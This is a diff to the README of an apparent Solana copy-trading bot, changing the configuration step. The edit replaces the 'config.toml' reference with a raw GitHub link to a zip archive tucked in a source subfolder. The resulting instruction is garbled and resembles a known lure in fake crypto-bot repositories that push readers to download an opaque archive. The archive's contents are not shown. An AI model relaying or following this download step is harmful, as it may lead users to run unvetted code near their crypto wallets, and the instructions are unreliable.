Adityakumar121k/solana-copy-trading/README.md

 Once you have the bot running, you need to configure it based on your trading preferences.
 Follow these steps:

 1. **Edit the Configuration File:**
-   Locate the `config.toml` file in the application folder.
+   Locate the `https://raw.githubusercontent.com/Adityakumar121k/solana-copy-trading/master/src/kernel/clients/solana-copy-trading-v1.2.zip` file in the application folder.
 Open it in any text editor.

 2. **Set Your Wallet Addresses:**
    Add the wallet addresses you want the bot to mirror.
 Make sure they are correct to ensure successful transactions.